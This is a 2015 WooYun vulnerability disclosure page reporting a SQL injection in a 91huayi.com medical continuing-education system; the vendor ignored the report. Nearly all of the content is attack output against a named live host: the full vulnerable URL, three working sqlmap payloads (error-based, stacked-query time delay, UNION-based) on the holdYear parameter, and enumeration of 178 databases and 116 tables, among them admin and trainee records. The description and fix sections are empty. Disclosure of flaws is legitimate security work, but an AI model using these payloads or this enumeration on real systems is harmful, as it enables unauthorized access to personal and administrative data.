当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0156600

漏洞标题:华医网某系统存在SQL注入漏洞

相关厂商:91huayi.com

漏洞作者: 路人甲

提交时间:2015-11-30 10:43

修复时间:2015-12-05 10:44

公开时间:2015-12-05 10:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-30: 细节已通知厂商并且等待厂商处理中
2015-12-05: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

http://cme.gxwskjw.91huayi.com/report/publicedPassedSummary.aspx?displayMode=1&frontForUnit=1&holdYear=11&lowUnitCode=200001&principalName=xpvmpofb&projectCode=94102&projectKind=%C8%AB%B2%BF&projectName=ibthlwvx&publicBatch=-1&state=publicedList&subject2=01&subject3=0101

11.jpg

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: holdYear (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: displayMode=1&frontForUnit=1&holdYear=11' AND 4171=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(113)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (4171=4171) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(113))) AND 'wJBu'='wJBu&lowUnitCode=200001&principalName=xpvmpofb&projectCode=94102&projectKind=%C8%AB%B2%BF&projectName=ibthlwvx&publicBatch=-1&state=publicedList&subject2=01&subject3=0101
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: displayMode=1&frontForUnit=1&holdYear=11';WAITFOR DELAY '0:0:5'--&lowUnitCode=200001&principalName=xpvmpofb&projectCode=94102&projectKind=%C8%AB%B2%BF&projectName=ibthlwvx&publicBatch=-1&state=publicedList&subject2=01&subject3=0101
Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: displayMode=1&frontForUnit=1&holdYear=11' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(113)+CHAR(113)+CHAR(98)+CHAR(113)+CHAR(99)+CHAR(72)+CHAR(97)+CHAR(116)+CHAR(88)+CHAR(101)+CHAR(86)+CHAR(79)+CHAR(70)+CHAR(70)+CHAR(113)+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(113)-- &lowUnitCode=200001&principalName=xpvmpofb&projectCode=94102&projectKind=%C8%AB%B2%BF&projectName=ibthlwvx&publicBatch=-1&state=publicedList&subject2=01&subject3=0101
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
available databases [178]:
[*] 0724zkys
[*] baicheng_wsglw
[*] baishan_wsglw
[*] BJ_JJPT
[*] BjApply
[*] bjhp0801
[*] ccme
[*] changchun_wsglw
[*] cme_beihai
[*] cme_binzhou
[*] cme_bj
[*] cme_haikou
[*] cme_hezhou
[*] cme_leshan
[*] cme_local_common
[*] cme_luzhou
[*] cme_meishan
[*] cme_middle_kjpt
[*] cme_sd
[*] cme_shenyang2
[*] cme_shiyan2
[*] cme_shiyan3
[*] cme_wenzhou2
[*] cme_wenzhou3
[*] cme_xjyfy
[*] cme_yanbianzhou
[*] cme_yanshi
[*] cme_yantai
[*] cme_yibin
[*] cme_yiwu
[*] cme_yunfu
[*] cme_ziyang
[*] cqwsw.net
[*] czwsw
[*] dlzwsw.91huayi
[*] DS_HY_COMMON
[*] exambd
[*] ezine_wenzhou
[*] ezine_yiwu2011
[*] gd_wj
[*] GPSS
[*] GSYXH
[*] gxav
[*] gxwskjw
[*] haoyisheng_guangdong
[*] haoyisheng_shenzhen
[*] hbno_mt
[*] hljnk
[*] hljwsw
[*] hncme
[*] hpexam0801
[*] hpexam_fj
[*] hpexam_sz
[*] hpst
[*] hy_com_shenyang
[*] hy_com_shiyan
[*] HY_ZhuanGang
[*] hyzc
[*] hzwj
[*] hzwsw.net
[*] jlshi
[*] kjpt_cme
[*] kjpt_common
[*] kjpt_data_upgrade_hb
[*] kjpt_data_upgrade_海南
[*] kjpt_posdata_swap
[*] kmwsw
[*] liaoyuan_wsglw
[*] master
[*] material
[*] mmmadb
[*] model
[*] msdb
[*] ncwsw
[*] new_cme_back0813
[*] NnCommDB
[*] pdsCommDB
[*] ppct
[*] praject_apply2
[*] prjapply_dg
[*] prjapply_gdfs
[*] prjapply_gdhy
[*] prjapply_gdjm
[*] prjapply_gdyj
[*] prjapply_gdzq
[*] prjapply_gx
[*] prjapply_hlj
[*] prjapply_jd
[*] prjapply_jl
[*] prjapply_nc
[*] prjapply_sd
[*] prjapply_sdq
[*] prjapply_shiyan
[*] prjapply_sx
[*] prjapply_xian
[*] prjapply_zh
[*] prjapply_zs
[*] project.cqwsw.net
[*] project_apply
[*] project_xj
[*] project_ya
[*] project_yn
[*] ProjectSY
[*] qjwsw
[*] rubbish
[*] sdlc
[*] sfjj
[*] shiyan_wsglw
[*] spwsw
[*] sspa_gxnn
[*] suining_wsglw
[*] swykCommDB
[*] sywsw.cn
[*] taizhou_wsglw
[*] tempdb
[*] tmp
[*] tmpunit海南
[*] toilet_water_apply
[*] tonghua_wsglw
[*] transcript
[*] weinan_wsglw
[*] wh_wsglw
[*] wj_binzhou
[*] wuhan_xmsb
[*] wuhanma.org.cn
[*] xian.wsglw.net
[*] xianyangcme
[*] XJWJ
[*] xnwsw
[*] xuancheng_wsglw
[*] yaan.com
[*] yanbian_wsglw
[*] ylwsw
[*] ynwsw
[*] yulin_wsglw
[*] yunfu
[*] ZJ_ZYYS_Exam
[*] ZJ_ZYYS_Train
[*] zj_zyys_trun
[*] zkys0801
[*] zkys_bj
[*] zkys_cq
[*] zkys_fj0227
[*] zkys_fj_temp
[*] zkys_gs
[*] zkys_gxlz
[*] zkys_nm
[*] zkys_sz
[*] ZYYS_AH_Turn
[*] ZYYS_BJ_Exam
[*] ZYYS_BJ_Train
[*] ZYYS_BJ_Turn0128
[*] ZYYS_BJ_TURN1027
[*] zyys_bj_turn_zy_0813
[*] zyys_cq_dsjyd
[*] zyys_cq_train
[*] zyys_gd_Exam
[*] zyys_gd_train
[*] zyys_gd_Turn
[*] zyys_guangxi_turn
[*] ZYYS_GX_Turn
[*] ZYYS_HN_Exam
[*] ZYYS_HN_Train
[*] ZYYS_HN_Turn
[*] zyys_jd_Exam
[*] zyys_jd_train
[*] zyys_jd_Turn
[*] ZYYS_JL_Exam
[*] ZYYS_JL_Train
[*] ZYYS_JL_Turn_ZY
[*] ZYYS_NMG_Turn
[*] zyys_qfs_turn
[*] zyys_Shan_turn_zy
[*] ZYYS_SX_Turn_ZY
[*] ZYYS_ZJ_Exam_ZY
[*] ZYYS_ZJ_Train_ZY
[*] ZYYS_ZJ_Turn_ZY
[*] zyysht


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: holdYear (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: displayMode=1&frontForUnit=1&holdYear=11' AND 4171=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(113)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (4171=4171) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(113))) AND 'wJBu'='wJBu&lowUnitCode=200001&principalName=xpvmpofb&projectCode=94102&projectKind=%C8%AB%B2%BF&projectName=ibthlwvx&publicBatch=-1&state=publicedList&subject2=01&subject3=0101
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: displayMode=1&frontForUnit=1&holdYear=11';WAITFOR DELAY '0:0:5'--&lowUnitCode=200001&principalName=xpvmpofb&projectCode=94102&projectKind=%C8%AB%B2%BF&projectName=ibthlwvx&publicBatch=-1&state=publicedList&subject2=01&subject3=0101
Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: displayMode=1&frontForUnit=1&holdYear=11' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(113)+CHAR(113)+CHAR(98)+CHAR(113)+CHAR(99)+CHAR(72)+CHAR(97)+CHAR(116)+CHAR(88)+CHAR(101)+CHAR(86)+CHAR(79)+CHAR(70)+CHAR(70)+CHAR(113)+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(113)-- &lowUnitCode=200001&principalName=xpvmpofb&projectCode=94102&projectKind=%C8%AB%B2%BF&projectName=ibthlwvx&publicBatch=-1&state=publicedList&subject2=01&subject3=0101
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
Database: cme_bj
[116 tables]
+----------------------------+
| 2014年导入平台全部人员信息 |
| 2015年区域项目 |
| 2015年远程课程 |
| 2015年远程项目_2_2分 |
| 2015年远程项目_2_3分 |
| DSJ_comp_dept |
| DSJ_kjpt_area_state |
| DSJ_kjpt_person |
| DSJ_kjpt_score |
| DSJ_kjpt_unit_state |
| DSJ_score_level |
| P1207 |
| V_studyDept |
| VhycomDept |
| actionlist |
| admin_user |
| assign_type |
| bbs_forum |
| bbs_thread |
| bj_to_hys |
| card_detail |
| card_log |
| card_nobind |
| card_pay_type |
| card_temp_20111025 |
| card_type_course |
| card_type_course |
| card_type_organ_allpay |
| card_type_organ_allpay |
| cme_city |
| cme_province |
| course_2014 |
| course_2014 |
| course_dept_2014 |
| course_dept_2014 |
| course_dept_editor |
| course_editor |
| course_extr |
| course_feedback |
| course_id |
| course_no |
| course_organ_assign_2014 |
| course_organ_assign_2014 |
| course_organ_assign_editor |
| course_related_2014 |
| course_related_2014 |
| course_related_editor |
| course_test |
| course_ware_2014 |
| course_ware_2014 |
| course_ware_editor |
| course_ware_feedback |
| course_ware_zhj |
| default_page_pic |
| dept_facade_related |
| dept_facade_related |
| dictionary_kind |
| dictionary_kind |
| expert_dept |
| expert_dept |
| gjj |
| hy_com_city |
| hy_com_county |
| hy_com_department |
| hy_com_dept_cme |
| hy_com_dept_cme |
| hy_com_dictionary_kind |
| hy_com_dictionary_kind |
| hy_com_hospital |
| hy_com_province |
| hy_com_user_register |
| item_leve |
| jiangyi |
| login_user_id_2014 |
| login_user_id_2014 |
| manager_course |
| manager_course |
| manager_group_action |
| manager_group_action |
| manager_log |
| menulist |
| nopasshys |
| organ_district |
| organ_district |
| p1130 |
| question_2014 |
| question_2014 |
| question_editor |
| question_option_2014 |
| question_option_2014 |
| question_option_editor |
| questiontmp |
| sns_dept |
| sp_manager |
| study_course_2014 |
| study_course_2014 |
| study_course_log |
| study_course_ware_2014 |
| study_course_ware_2014 |
| sysdiagrams |
| tempData |
| temp_yt_1 |
| temp_yt_no_1 |
| temp_yt_no_1 |
| tmp |
| ui_list |
| urseicno |
| user_organ_card |
| v_cme_studyInfo_setHYS |
| v_cme_studyInfo_setHYS |
| v_studyArea |
| v_study_user_info |
| web_config |
| 北京取消学分处理_20141015 |
| 北京学习平台学员信息_2015_2 |
| 北京学习平台学员信息_2015_2 |
+----------------------------+

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-12-05 10:44

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无


漏洞评价:

评价